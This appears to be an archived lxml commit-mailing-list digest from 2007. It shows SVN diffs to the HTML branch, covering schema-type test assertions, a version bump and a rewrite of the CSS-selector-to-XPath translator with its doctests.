self.assertEquals("xsd:string", child_types[ 1]) + self.assertEquals("xsd:double", child_types[ 2]) + self.assertEquals("xsd:string", child_types[ 3]) + self.assertEquals("xsd:boolean", child_types[ 4]) + self.assertEquals(None, child_types[ 5]) + self.assertEquals(None, child_types[ 6]) + self.assertEquals("xsd:int", child_types[ 7]) + self.assertEquals("xsd:int", child_types[ 8]) + self.assertEquals("xsd:int", child_types[ 9]) self.assertEquals("xsd:string", child_types[10]) - self.assertEquals("xsd:float", child_types[11]) + self.assertEquals("xsd:double", child_types[11]) self.assertEquals("xsd:integer", child_types[12]) self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) @@ -659,18 +679,18 @@ child_types = [ c.get(XML_SCHEMA_INSTANCE_TYPE_ATTR) for c in root.iterchildren() ] - self.assertEquals("xsd:int", child_types[0]) - self.assertEquals("xsd:string", child_types[1]) - self.assertEquals("xsd:float", child_types[2]) - self.assertEquals("xsd:string", child_types[3]) - self.assertEquals("xsd:boolean", child_types[4]) - self.assertEquals(None, child_types[5]) - self.assertEquals(None, child_types[6]) - self.assertEquals("xsd:double", child_types[7]) - self.assertEquals("xsd:float", child_types[8]) - self.assertEquals("xsd:string", child_types[9]) + self.assertEquals("xsd:int", child_types[ 0]) + self.assertEquals("xsd:string", child_types[ 1]) + self.assertEquals("xsd:double", child_types[ 2]) + self.assertEquals("xsd:string", child_types[ 3]) + self.assertEquals("xsd:boolean", child_types[ 4]) + self.assertEquals(None, child_types[ 5]) + self.assertEquals(None, child_types[ 6]) + self.assertEquals("xsd:double", child_types[ 7]) + self.assertEquals("xsd:float", child_types[ 8]) + self.assertEquals("xsd:string", child_types[ 9]) self.assertEquals("xsd:string", child_types[10]) - self.assertEquals("xsd:float", child_types[11]) + self.assertEquals("xsd:double", child_types[11]) self.assertEquals("xsd:integer", child_types[12]) self.assertEquals("true", 
root.n.get(XML_SCHEMA_NIL_ATTR)) @@ -730,7 +750,7 @@ for c in root.iterchildren() ] self.assertEquals("xsd:int", child_types[ 0]) self.assertEquals("xsd:string", child_types[ 1]) - self.assertEquals("xsd:float", child_types[ 2]) + self.assertEquals("xsd:double", child_types[ 2]) self.assertEquals("xsd:string", child_types[ 3]) self.assertEquals("xsd:boolean", child_types[ 4]) self.assertEquals(None, child_types[ 5]) @@ -739,7 +759,7 @@ self.assertEquals("xsd:int", child_types[ 8]) self.assertEquals("xsd:int", child_types[ 9]) self.assertEquals("xsd:string", child_types[10]) - self.assertEquals("xsd:float", child_types[11]) + self.assertEquals("xsd:double", child_types[11]) self.assertEquals("xsd:integer", child_types[12]) self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) Deleted: /lxml/branch/html/src/lxml/tests/test_xinclude.xml ============================================================================== --- /lxml/branch/html/src/lxml/tests/test_xinclude.xml Fri Jun 29 19:05:43 2007 +++ (empty file) @@ -1,4 +0,0 @@ - - - - \ No newline at end of file Modified: lxml/branch/html/src/lxml/tree.pxd ============================================================================== --- lxml/branch/html/src/lxml/tree.pxd (original) +++ lxml/branch/html/src/lxml/tree.pxd Fri Jun 29 19:05:43 2007 @@ -41,6 +41,9 @@ cdef xmlCharEncoding xmlDetectCharEncoding(char* text, int len) cdef char* xmlGetCharEncodingName(xmlCharEncoding enc) +cdef extern from "libxml/chvalid.h": + cdef int xmlIsChar_ch(char c) + cdef extern from "libxml/hash.h": ctypedef struct xmlHashTable ctypedef void xmlHashScanner(void* payload, void* data, char* name) Modified: lxml/branch/html/src/lxml/xmlerror.pxi ============================================================================== --- lxml/branch/html/src/lxml/xmlerror.pxi (original) +++ lxml/branch/html/src/lxml/xmlerror.pxi Fri Jun 29 19:05:43 2007 @@ -480,7 +480,9 @@ # Constants are stored in tuples of strings, for which Pyrex generates 
very # efficient setup code. To parse them, iterate over the tuples and parse each -# line in each string independently. +# line in each string independently. Tuples of strings (instead of a plain +# string) are required as some C-compilers of a certain well-known OS vendor +# cannot handle strings that are a few thousand bytes in length. cdef object __ERROR_LEVELS __ERROR_LEVELS = ("""\ Modified: lxml/branch/html/src/lxml/xmlparser.pxd ============================================================================== --- lxml/branch/html/src/lxml/xmlparser.pxd (original) +++ lxml/branch/html/src/lxml/xmlparser.pxd Fri Jun 29 19:05:43 2007 @@ -23,6 +23,9 @@ char* value, int len) + ctypedef void (*commentSAXFunc)(void* ctx, + char* value) + cdef extern from "libxml/tree.h": ctypedef struct xmlParserInput ctypedef struct xmlParserInputBuffer: @@ -34,6 +37,7 @@ startElementNsSAX2Func startElementNs endElementNsSAX2Func endElementNs cdataBlockSAXFunc cdataBlock + commentSAXFunc comment cdef extern from "libxml/xmlIO.h": cdef xmlParserInputBuffer* xmlAllocParserInputBuffer(int enc) Modified: lxml/branch/html/src/lxml/xmlschema.pxi ============================================================================== --- lxml/branch/html/src/lxml/xmlschema.pxi (original) +++ lxml/branch/html/src/lxml/xmlschema.pxi Fri Jun 29 19:05:43 2007 @@ -38,12 +38,12 @@ root_node = _rootNodeOrRaise(etree) # work around for libxml2 bug if document is not XML schema at all - if _LIBXML_VERSION_INT < 20624: - c_node = root_node._c_node - c_href = _getNs(c_node) - if c_href is NULL or \ - cstd.strcmp(c_href, 'http://www.w3.org/2001/XMLSchema') != 0: - raise XMLSchemaParseError, "Document is not XML Schema" + #if _LIBXML_VERSION_INT < 20624: + c_node = root_node._c_node + c_href = _getNs(c_node) + if c_href is NULL or \ + cstd.strcmp(c_href, 'http://www.w3.org/2001/XMLSchema') != 0: + raise XMLSchemaParseError, "Document is not XML Schema" fake_c_doc = _fakeRootDoc(doc._c_doc, root_node._c_node) 
self._error_log.connect() @@ -61,7 +61,7 @@ if parser_ctxt is not NULL: self._c_schema = xmlschema.xmlSchemaParse(parser_ctxt) - if _LIBXML_VERSION_INT > 20624: + if _LIBXML_VERSION_INT >= 20624: xmlschema.xmlSchemaFreeParserCtxt(parser_ctxt) self._error_log.disconnect() Modified: lxml/branch/html/version.txt ============================================================================== --- lxml/branch/html/version.txt (original) +++ lxml/branch/html/version.txt Fri Jun 29 19:05:43 2007 @@ -1 +1 @@ -1.3beta +2.0dev Modified: lxml/branch/html/versioninfo.py ============================================================================== --- lxml/branch/html/versioninfo.py (original) +++ lxml/branch/html/versioninfo.py Fri Jun 29 19:05:43 2007 @@ -34,7 +34,10 @@ data = map(str.splitlines, data.split('\n\x0c\n')) del data[0][0] # get rid of the '8' dirurl = data[0][3] - localrev = max([int(d[9]) for d in data if len(d)>9 and d[9]]) + try: + localrev = max([int(d[9]) for d in data if len(d)>9 and d[9]]) + except ValueError: + pass # may be some newly added directory elif data.startswith(' Author: ianb Date: Fri Jun 29 23:50:47 2007 New Revision: 44635 Added: lxml/branch/html/src/lxml/html/tests/test_css_select.txt (contents, props changed) Modified: lxml/branch/html/src/lxml/html/css.py lxml/branch/html/src/lxml/html/tests/test_css.py lxml/branch/html/src/lxml/html/tests/test_css.txt Log: improvement to CSS selectors, and more tests Modified: lxml/branch/html/src/lxml/html/css.py ============================================================================== --- lxml/branch/html/src/lxml/html/css.py (original) +++ lxml/branch/html/src/lxml/html/css.py Fri Jun 29 23:50:47 2007 @@ -88,60 +88,52 @@ method = getattr(self, method) return method(sel_path, self.expr) - def _xpath_nth_child(self, xpath, expr, last=False): - if isinstance(expr, int): - return self._xpath_nth_child_simple(xpath, expr, last) - if not isinstance(expr, int): - a, b = parse_series(expr) - if not a: - # 
a=0 means nothing is returned... - xpath.add_condition('false()') - return xpath - if a == 1: - return self._xpath_nth_child_simple(xpath, expr, last) - if b > 0: - b_neg = str(-b) - else: - b_neg = '+%s' % (-b) - expr = '(position() %s) mod %s = 0' % (b_neg, a) - if b >= 0: - expr += ' and position() >= %s' % b - xpath.add_condition(expr) + def _xpath_nth_child(self, xpath, expr, last=False, + add_name_test=True): + a, b = parse_series(expr) + if not a: + # a=0 means nothing is returned... + xpath.add_condition('false() and position() = 0') return xpath - # FIXME: handle an+b, odd, even - # an+b means every-a, plus b, e.g., 2n+1 means odd - # 0n+b means b - # n+0 means a=1, i.e., all elements - # an means every a elements, i.e., 2n means even - # -n means -1n - # -1n+6 means elements 6 and previous - - def _xpath_nth_child_simple(self, xpath, expr, last=False): - if isinstance(expr, int): - expr -= 1 + if add_name_test: + xpath.add_name_test() + xpath.add_star_prefix() + if a == 1: if last: - expr = 'last() - %s' % expr - xpath = XPath('*/%s' % xpath) - xpath.add_index(expr) + b = 'last() - %s' % b + xpath.add_condition('position() = %s' % b) return xpath + if last: + # FIXME: I'm not sure if this is right + a = -a + b = -b + if b > 0: + b_neg = str(-b) + else: + b_neg = '+%s' % (-b) + expr = '(position() %s) mod %s = 0' % (b_neg, a) + if b >= 0: + expr += ' and position() >= %s' % b + elif b < 0 and last: + expr += ' and position() < (last() %s)' % b + xpath.add_condition(expr) + return xpath + # FIXME: handle an+b, odd, even + # an+b means every-a, plus b, e.g., 2n+1 means odd + # 0n+b means b + # n+0 means a=1, i.e., all elements + # an means every a elements, i.e., 2n means even + # -n means -1n + # -1n+6 means elements 6 and previous def _xpath_nth_last_child(self, xpath, expr): return self._xpath_nth_child(xpath, expr, last=True) - def _xpath_nth_of_type(self, xpath, expr, last=False): - # Like nth-of-type, but only for *this* type - if isinstance(expr, 
int): - expr -= 1 - if last: - expr = 'last() - %s' % expr - xpath = XPath('*/%s' % xpath) - xpath.add_index(expr) - return xpath - else: - raise NotImplementedError + def _xpath_nth_of_type(self, xpath, expr): + return self._xpath_nth_child(xpath, expr, add_name_test=False) def _xpath_nth_last_of_type(self, xpath, expr): - return self._xpath_nth_of_type(xpath, expr, last=True) + return self._xpath_nth_child(xpath, expr, last=True, add_name_test=False) def _xpath_contains(self, xpath, expr): # text content, minus tags, must contain expr @@ -149,6 +141,7 @@ expr = expr._format_element() xpath.add_condition('contains(css:lower-case(string(.)), %s)' % xpath_repr(expr.lower())) + # FIXME: Currently case insensitive matching doesn't seem to be happening return xpath def _xpath_not(self, xpath, expr): @@ -199,7 +192,8 @@ return el_xpath def _xpath_checked(self, xpath): - xpath.add_condition("(@selected or @checked) and (node-name(.) = 'input' or node-name(.) = 'option')") + # FIXME: is this really all the elements? + xpath.add_condition("(@selected or @checked) and (name(.) = 'input' or name(.) = 'option')") return xpath def _xpath_root(self, xpath): @@ -207,35 +201,38 @@ raise NotImplementedError def _xpath_first_child(self, xpath): - xpath = XPath('*/%s' % xpath) - xpath.add_condition('position() = 0') + xpath.add_star_prefix() + xpath.add_name_test() + xpath.add_condition('position() = 1') return xpath def _xpath_last_child(self, xpath): - xpath = XPath('*/%s' % xpath) + xpath.add_star_prefix() + xpath.add_name_test() xpath.add_condition('position() = last()') return xpath def _xpath_first_of_type(self, xpath): - xpath = XPath('*/%s' % xpath) - xpath.add_index(0) + xpath.add_star_prefix() + xpath.add_condition('position() = 1') return xpath def _xpath_last_of_type(self, xpath): - xpath.add_index('last()') + xpath.add_star_prefix() + xpath.add_condition('position() = last()') return xpath def _xpath_only_child(self, xpath): - xpath.add_condition('count(..) 
= 1') + xpath.add_name_test() + xpath.add_condition('last() = 1') return xpath def _xpath_only_of_type(self, xpath): - # FIXME: I doubt this is right - xpath.add_condition('count(../node-name(.)) = 1') + xpath.add_condition('last() = 1') return xpath def _xpath_empty(self, xpath): - xpath.add_condition("count(.) = 0 and string(.) = ''") + xpath.add_condition("count(./children::*) = 0 and string(.) = ''") return xpath class Attrib(object): @@ -311,6 +308,7 @@ path.add_condition('substring(%s, string-length(%s)-%s) = %s' % (attrib, attrib, len(value)-1, xpath_repr(value))) elif self.operator == '*=': + # FIXME: case sensitive? path.add_condition('contains(%s, %s)' % ( attrib, xpath_repr(value))) else: @@ -339,9 +337,11 @@ def xpath(self): if self.namespace == '*': - return XPath(self.element.lower()) + el = self.element.lower() else: - return XPath('%s:%s' % (self.namespace, self.element)) + # FIXME: Should we lowercase here? + el = '%s:%s' % (self.namespace, self.element) + return XPath(element=el) class Hash(object): """ @@ -359,7 +359,7 @@ def xpath(self): path = self.selector.xpath() - path.add_condition('@id=%s' % xpath_repr(self.id)) + path.add_condition('@id = %s' % xpath_repr(self.id)) return path class Or(object): @@ -412,23 +412,25 @@ def _xpath_descendant(self, xpath, sub): # when sub is a descendant in any way of xpath - return XPath('%s/descendant::%s' % (xpath, sub.xpath())) - + xpath.join('/descendant::', sub.xpath()) + return xpath + def _xpath_child(self, xpath, sub): # when sub is an immediate child of xpath - return XPath(str(xpath) + '/' + str(sub.xpath())) + xpath.join('/', sub.xpath()) + return xpath def _xpath_direct_adjacent(self, xpath, sub): # when sub immediately follows xpath - path = self._xpath_indirect_adjacent(xpath, sub) - path.add_index(0) - return path + xpath.join('/following-sibling::', sub.xpath()) + xpath.add_name_test() + xpath.add_condition('position() = 1') + return xpath def _xpath_indirect_adjacent(self, xpath, sub): # when 
sub comes somewhere after xpath as a sibling - return XPath('%s/following-sibling::%s' % ( - xpath, sub.xpath())) - + xpath.join('/following-sibling::', sub.xpath()) + return xpath ############################## ## XPath objects: @@ -439,11 +441,8 @@ expr = css_expr.xpath() assert expr is not None, ( "Got None for xpath expression from %s" % repr(css_expr)) - if isinstance(expr, XPathOr): - for item in expr.items: - item.element_path = prefix + item.element_path - else: - expr.element_path = prefix + expr.element_path + if prefix: + expr.add_prefix(prefix) return str(expr) def run_xpath(doc, xpath): @@ -455,12 +454,19 @@ class XPath(object): - def __init__(self, element_path, condition=None): - self.element_path = element_path + def __init__(self, prefix=None, path=None, element='*', condition=None): + self.prefix = prefix + self.path = path + self.element = element self.condition = condition def __str__(self): - path = str(self.element_path) + path = '' + if self.prefix is not None: + path += str(self.prefix) + if self.path is not None: + path += str(self.path) + path += str(self.element) if self.condition: path += '[%s]' % self.condition return path @@ -475,8 +481,40 @@ else: self.condition = condition - def add_index(self, index): - self.element_path = '%s[%s]' % (self.element_path, index) + def add_path(self, part): + if self.path is None: + self.path = self.element + else: + self.path += self.element + self.element = part + + def add_prefix(self, prefix): + if self.prefix: + self.prefix = prefix + self.prefix + else: + self.prefix = prefix + + def add_name_test(self): + if self.element == '*': + # We weren't doing a test anyway + return + self.add_condition("name() = %s" % xpath_repr(self.element)) + self.element = '*' + + def add_star_prefix(self): + if self.path: + self.path += '*/' + else: + self.path = '*/' + + def join(self, combiner, other): + prefix = str(self) + prefix += combiner + path = (other.prefix or '') + (other.path or '') + self.prefix = 
prefix + self.path = path + self.element = other.element + self.condition = other.condition class XPathOr(XPath): @@ -485,14 +523,15 @@ the union, it's the sum, so duplicate elements will appear. """ - def __init__(self, items): + def __init__(self, items, prefix=None): for item in items: assert item is not None self.items = items + self.prefix = prefix def __str__(self): - return ' | '.join(map(str, self.items)) - + prefix = self.prefix or '' + return ' | '.join([prefix + str(i) for i in self.items]) def xpath_repr(s): # FIXME: I don't think this is right @@ -650,6 +689,9 @@ """ if isinstance(s, Element): s = s._format_element() + if not s or s == '*': + # Happens when there's nothing, which CSS things of as * + return (1, 0) if isinstance(s, int): # Happens when you just get a number return (1, s) @@ -657,6 +699,8 @@ return (2, 1) elif s == 'even': return (2, 0) + elif s == 'n': + return (1, 0) if 'n' not in s: # Just a b return int(s) Modified: lxml/branch/html/src/lxml/html/tests/test_css.py ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_css.py (original) +++ lxml/branch/html/src/lxml/html/tests/test_css.py Fri Jun 29 23:50:47 2007 @@ -107,6 +107,7 @@ def test_suite(): suite = unittest.TestSuite() - suite.addTests([doctest.DocFileSuite('test_css.txt')]) + for fn in 'test_css.txt', 'test_css_select.txt': + suite.addTests([doctest.DocFileSuite(fn)]) suite.addTests(list(CSSTestCase.all())) return suite Modified: lxml/branch/html/src/lxml/html/tests/test_css.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_css.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_css.txt Fri Jun 29 23:50:47 2007 @@ -69,33 +69,35 @@ e[@hreflang = 'en' or starts-with(@hreflang, 'en-')] >>> #xpath('E:root') >>> xpath('E:nth-child(1)') - */e[0] + */*[name() = 'e' and (position() = 1)] >>> xpath('E:nth-last-child(1)') - 
*/e[last() - 0] + */*[name() = 'e' and (position() = last() - 1)] + >>> xpath('E:nth-last-child(2n+2)') + */*[name() = 'e' and ((position() +2) mod -2 = 0 and position() < (last() -2))] >>> xpath('E:nth-of-type(1)') - */e[0] + */e[position() = 1] >>> xpath('E:nth-last-of-type(1)') - */e[last() - 0] + */e[position() = last() - 1] >>> xpath('E:first-child') - */e[position() = 0] + */*[name() = 'e' and (position() = 1)] >>> xpath('E:last-child') - */e[position() = last()] + */*[name() = 'e' and (position() = last())] >>> xpath('E:first-of-type') - */e[0] + */e[position() = 1] >>> xpath('E:last-of-type') - e[last()] + */e[position() = last()] >>> xpath('E:only-child') - e[count(..) = 1] + *[name() = 'e' and (last() = 1)] >>> xpath('E:only-of-type') - e[count(../node-name(.)) = 1] + e[last() = 1] >>> xpath('E:empty') - e[count(.) = 0 and string(.) = ''] + e[count(./children::*) = 0 and string(.) = ''] >>> xpath('E:contains("foo")') e[contains(css:lower-case(string(.)), 'foo')] >>> xpath('E.warning') e[contains(concat(' ', normalize-space(@class), ' '), ' warning ')] >>> xpath('E#myid') - e[@id='myid'] + e[@id = 'myid'] >>> xpath('E:not(:contains("foo"))') e[not(contains(css:lower-case(string(.)), 'foo'))] >>> xpath('E F') @@ -103,8 +105,11 @@ >>> xpath('E > F') e/f >>> xpath('E + F') - e/following-sibling::f[0] + e/following-sibling::*[name() = 'f' and (position() = 1)] >>> xpath('E ~ F') e/following-sibling::f >>> xpath('div#container p') - div[@id='container']/descendant::p + div[@id = 'container']/descendant::p + >>> # FIXME: This isn't right, but I don't know what *is* right + >>> xpath('p *:only-of-type') + p/descendant::*[last() = 1] Added: lxml/branch/html/src/lxml/html/tests/test_css_select.txt ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/test_css_select.txt Fri Jun 29 23:50:47 2007 @@ -0,0 +1,149 @@ +This is a test of CSS selectors. 
We setup a document we'll use for +all our selections, and a function make querying simpler: + + >>> from lxml.html.css import run_css + >>> from lxml.html import HTML + >>> doc = HTML(''' + ... + ...
+ ... + ... + ... link + ...
    + ...
  1. content
  2. + ...
  3. + ...
    + ...
    + ...
  4. + ...
  5. + ...
  6. + ...
  7. + ...
  8. + ...
  9. + ...
+ ...

+ ... hi there + ... guy

+ ...
    + ...
+ ...
+ ...
+ ... ''') + >>> order = {} + >>> for count, el in enumerate(doc.getiterator()): + ... order[el] = count + >>> def select_ids(selector): + ... items = run_css(doc, selector) + ... if not items: + ... return 'empty' + ... items = run_css(doc, selector) + ... items.sort(key=lambda el: order[el]) + ... return ', '.join([el.get('id', 'nil') for el in items]) + >>> def pcss(main, *selectors): + ... result = select_ids(main) + ... for selector in selectors: + ... sel_result = select_ids(selector) + ... if sel_result != result: + ... print 'Selector %r returns %s' % (selector, sel_result) + ... print result + +Now, the tests: + + >>> pcss('*') # doctest: +ELLIPSIS + nil, nil, nil, outer-div, ... foobar-span + >>> pcss('div') + outer-div, li-div, foobar-div + >>> pcss('a[name]') + name-anchor + >>> pcss('a[rel]') + tag-anchor, nofollow-anchor + >>> pcss('a[rel="tag"]') + tag-anchor + >>> pcss('a[href*="localhost"]') + tag-anchor + >>> pcss('a[href^="http"]') + tag-anchor, nofollow-anchor + >>> pcss('a[href^="http:"]') + tag-anchor + >>> pcss('a[href$="org"]') + nofollow-anchor + >>> pcss('div[foobar~="bc"]', 'div[foobar~="cde"]') + foobar-div + >>> pcss('div[foobar~="cd"]') + empty + >>> pcss('*[lang|="en"]', '*[lang|="en-US"]') + second-li + >>> pcss('*[lang|="e"]') + empty + >>> pcss('li:nth-child(3)') + third-li + >>> pcss('li:nth-child(10)') + empty + >>> pcss('li:nth-child(2n)', 'li:nth-child(even)', 'li:nth-child(2n+0)') + second-li, fourth-li, sixth-li + >>> pcss('li:nth-child(+2n+1)', 'li:nth-child(odd)') + first-li, third-li, fifth-li, seventh-li + >>> pcss('li:nth-child(2n+4)') + fourth-li, sixth-li + >>> # FIXME: I'm not 100% sure this is right: + >>> pcss('li:nth-child(3n+1)') + first-li, fourth-li, seventh-li + >>> # FIXME: I'm not sure if nth-last-child(1) or nth-last-child(1) + >>> # should be equivalent to nth-last-child() + >>> pcss('li:nth-last-child()', 'li:nth-last-child(0)') + seventh-li + >>> pcss('li:nth-last-child(2n)', 'li:nth-last-child(even)') + 
second-li, fourth-li, sixth-li + >>> pcss('li:nth-last-child(2n+2)') + second-li, fourth-li + >>> pcss('ol:first-of-type') + first-ol + >>> pcss('ol:nth-child(1)') + empty + >>> pcss('ol:nth-of-type(2)') + second-ol + >>> # FIXME: like above, (1) or (2)? + >>> pcss('ol:nth-last-of-type(1)') + first-ol + >>> pcss('span:only-child') + foobar-span + >>> pcss('li div:only-child') + li-div + >>> pcss('div *:only-child') + foobar-span + >>> pcss('p *:only-of-type') + p-em + >>> pcss('p:only-of-type') + paragraph + >>> pcss('a:empty') + name-anchor + >>> pcss('li:empty') + third-li, fourth-li, fifth-li, sixth-li + >>> pcss('*:contains("link")') + nil, nil, outer-div, tag-anchor, nofollow-anchor + >>> pcss('*:contains("E")') + nil, nil, outer-div, first-ol, first-li, paragraph, p-em + >>> pcss('.a', '.b', '*.a', 'ol.a') + first-ol + >>> pcss('.c', '*.c') + first-ol, third-li, fourth-li + >>> pcss('ol *.c', 'ol li.c', 'ol ~ li.c', 'ol > li.c') + third-li, fourth-li + >>> pcss('#first-li', 'li#first-li', '*#first-li') + first-li + >>> # Need some tests of :not() + >>> pcss('li div', 'li > div', 'div div') + li-div + >>> pcss('div > div') + empty + >>> pcss('div + div') + foobar-div + >>> pcss('a ~ a') + tag-anchor, nofollow-anchor + >>> pcss('a[rel="tag"] ~ a') + nofollow-anchor + >>> pcss('ol#first-ol li:last-child', 'ol#first-ol *:last-child') + seventh-li + \ No newline at end of file From ianb at codespeak.net Sat Jun 30 01:36:03 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Sat, 30 Jun 2007 01:36:03 +0200 (CEST) Subject: [Lxml-checkins] r44639 - in lxml/branch/html/src/lxml/html: . 
tests Message-ID: <20070629233603.09EE1811C@code0.codespeak.net> Author: ianb Date: Sat Jun 30 01:36:03 2007 New Revision: 44639 Modified: lxml/branch/html/src/lxml/html/css.py lxml/branch/html/src/lxml/html/tests/test_css.txt lxml/branch/html/src/lxml/html/tests/test_css_select.txt Log: More improvements to the selectors Modified: lxml/branch/html/src/lxml/html/css.py ============================================================================== --- lxml/branch/html/src/lxml/html/css.py (original) +++ lxml/branch/html/src/lxml/html/css.py Sat Jun 30 01:36:03 2007 @@ -232,7 +232,7 @@ return xpath def _xpath_empty(self, xpath): - xpath.add_condition("count(./children::*) = 0 and string(.) = ''") + xpath.add_condition("count(./child::*) = 0 and normalize-space(.) = ''") return xpath class Attrib(object): @@ -454,11 +454,13 @@ class XPath(object): - def __init__(self, prefix=None, path=None, element='*', condition=None): + def __init__(self, prefix=None, path=None, element='*', condition=None, + star_prefix=False): self.prefix = prefix self.path = path self.element = element self.condition = condition + self.star_prefix = star_prefix def __str__(self): path = '' @@ -502,15 +504,24 @@ self.element = '*' def add_star_prefix(self): + """ + Adds a /* prefix if there is no prefix. This is when you need + to keep context's constrained to a single parent. 
+ """ if self.path: self.path += '*/' else: self.path = '*/' + self.star_prefix = True def join(self, combiner, other): prefix = str(self) prefix += combiner path = (other.prefix or '') + (other.path or '') + # We don't need a star prefix if we are joining to this other + # prefix; so we'll get rid of it + if other.star_prefix and path == '*/': + path = '' self.prefix = prefix self.path = path self.element = other.element Modified: lxml/branch/html/src/lxml/html/tests/test_css.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_css.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_css.txt Sat Jun 30 01:36:03 2007 @@ -91,7 +91,7 @@ >>> xpath('E:only-of-type') e[last() = 1] >>> xpath('E:empty') - e[count(./children::*) = 0 and string(.) = ''] + e[count(./child::*) = 0 and normalize-space(.) = ''] >>> xpath('E:contains("foo")') e[contains(css:lower-case(string(.)), 'foo')] >>> xpath('E.warning') Modified: lxml/branch/html/src/lxml/html/tests/test_css_select.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_css_select.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_css_select.txt Sat Jun 30 01:36:03 2007 @@ -1,7 +1,7 @@ This is a test of CSS selectors. We setup a document we'll use for all our selections, and a function make querying simpler: - >>> from lxml.html.css import run_css + >>> from lxml.html.css import run_css, xpath >>> from lxml.html import HTML >>> doc = HTML(''' ... @@ -20,7 +20,7 @@ ... c"> ...
  • ...
  • - ...
  • + ...
  • ... ...

    ... hi there @@ -120,7 +120,7 @@ >>> pcss('a:empty') name-anchor >>> pcss('li:empty') - third-li, fourth-li, fifth-li, sixth-li + third-li, fourth-li, fifth-li, sixth-li, seventh-li >>> pcss('*:contains("link")') nil, nil, outer-div, tag-anchor, nofollow-anchor >>> pcss('*:contains("E")') @@ -129,7 +129,7 @@ first-ol >>> pcss('.c', '*.c') first-ol, third-li, fourth-li - >>> pcss('ol *.c', 'ol li.c', 'ol ~ li.c', 'ol > li.c') + >>> pcss('ol *.c', 'ol li.c', 'li ~ li.c', 'ol > li.c') third-li, fourth-li >>> pcss('#first-li', 'li#first-li', '*#first-li') first-li